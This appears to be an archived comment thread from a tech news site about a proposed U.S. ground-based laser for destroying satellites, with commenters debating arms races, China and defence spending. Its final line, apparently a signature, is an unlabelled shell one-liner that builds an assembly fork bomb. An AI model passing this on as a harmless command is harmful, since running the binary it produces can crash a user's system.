U.S. Considers Anti-Satellite Laser
SpaceAdmiral writes "The U.S. government wants to develop a ground-based weapon to shoot down enemy satellites in orbit. The laser will be much more powerful and sophisticated than a similar endeavor a decade ago. From the article: '... some Congressional Democrats and other experts fault the research as potential fuel for an antisatellite arms race that could ultimately hurt this nation more than others because the United States relies so heavily on military satellites, which aid navigation, reconnaissance and attack warning.'"
Nothing says 'Peace' like the United States blasting another country's satellite out of the sky. I can't see how doing so would help prevent attacks on the U.S. Perhaps the idea is to disable communications and espionage capabilities, but there are other, more conventional means of warfare, as ineffective as they may be.
The other theory, give countries warnings about removing satellites? Countries love ultimatums too. Don't get me wrong, I'm not saying that I'm against this (or for it, really) but I'm suggesting that perhaps the political and diplomatic repercussions might need to be investigated more thoroughly.
From a sci-fi point of view, its Spies Like Us all over again! Sounds interesting and technological to say the least.
And they said zombies weren't real!
A mirror.
Far more likely it's to protect America's "intellectual property economy" when it's cheap enough for private individuals to launch their own satellites to disseminate information under any laws they see fit.
Wow. There's my first good laugh of the day.
No, this is more of a paranoid-delusional fantasy of the Pentagon and some bureaucrats who don't want competition from China and maybe Russia. The key to U.S. military dominance is our excellent satellite intelligence. While HUMINT helps with the social engineering aspects of war, nothing but a satellite combined with proper munitions can blow up a tank underneath a bridge without hitting the bridge. From 40,000 feet. Our satellites give our military and NIMA a detailed view of pretty much every square meter of the planet, and we use this to blow shit up. No other nation on the globe has this capability to the extent we do. The United States government wants to keep it this way.
So, we're in a hypothetical future conflict with China. They have satellite capabilities similar to ours. Maybe not as good, but similar in ability. We use these lasers to blow up their satellites, removing their capability to deliver precision guided munitions. We retain that capability. We win the fight. Maybe not the war, as Iraq is teaching it takes more than bombs to do that, but at least the U.S. isn't the country blown to bits with an occupying force.
24 beers in a case, 24 hours in a day. Coincidence? I think not!
That's because the primary purpose of this program, like so many others, is to transfer vast amounts of money from the federal treasury to certain politically cooperative industries. Like Star Wars before it, I doubt that there is anyone in the Bush administration that cares one iota whether it has any real military value or even whether it ever "works" or not. The real (political) value is in the spending itself.
Umm, read some history. There's even a picture of one National Socialist German Labor Party nuke design.
Imperial Japan had nuclear bomb programs too.
Personally, I'm glad America got there first.
The Soviets took the easy route. They had some Useful Idiots steal the technology.
The Soviets had ASAT programs too. ASAT weaponry is old news, it's just that now they're using lasers rather than missiles. Heck, even that's not all that new, though making it work would be.
Don't you think the way for the US to really ensure its population's security would be to try to track down the arsenal of the former USSR?
Don't you think Putin ought to take nuclear security more seriously? The Russians built the damn things and they're not so poor that they can't deal with them if they want to, especially with high oil prices pouring hard currency into Russian state coffers.
My response to reading the article: duh!
Here are some recent articles on the developments in China. The US is not starting this race, but it'd be nice to keep up regardless.
http://www.usatoday.com/tech/science/space/2005-07 -27-china-satellites_x.htm m l
http://www.atimes.com/atimes/China/HD20Ad03.html
http://www.house.gov/coxreport/chapfs/ch4.html
http://www.spacedaily.com/news/china-01c.html
http://www.taiwandc.org/twcom/84-no3.htm
http://www.afio.com/sections/wins/1998/notes48.ht
The world is, a dangerous place. As with Sudan and Iran, the UN is no deterrent to aggression. Enlightened self-interest directs us to investigate these types of systems for the same reasons we investigate lethal pathogens. Surviving them requires understanding them even if we never intend to use them.
#-#
Ad Astra Per Aspera
A rough road leads to the stars
I'm sure the French thought something similar when they built the Maginot line - "Now we're safe from the Germans, all wars will be small colonial ones".
The world can change pretty quickly, as Pearl Harbour or 9/11 show. If you want to survive, you need to prepare for all possible sorts of wars, not just the ones that seem likely at the moment. And a war with China is all two possible. I'm not suggesting that either side want it, but if you look at the regular standoffs over Taiwan, it's always possible that an accident could esacalate into a very dangerous situation. To a lesser extent, it's possible that North Korea could drag the Chinese and the US into a conflict.
And a war between China and the US would be much more evenly balanced in a sortf of Zerg vs Protoss way. It would also be marked by extreme ruthlessness, and it's hard to imagine that shooting down satellites would be regarded as particularly unacceptable.
And there are other possible conflicts where the US would be evenly matched, e.g. against Russia or even Iran. Whilst it's unlikely that Iran would be able to launch satellites, they would be able to buy coverage & GPS like services from European or Russian ones.
Even if none of this happens, shooting down satellites with a ground based laser is a cool trick. AFAIK, the US does have anti satellite weapons already - there was a cold war program to fire missiles from an F15. Looking at that link, the Russians experimented with a load of anti satellite techniques from kamikaze 'figher satellites' to a ground based laser that fry satellite's image sensors.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;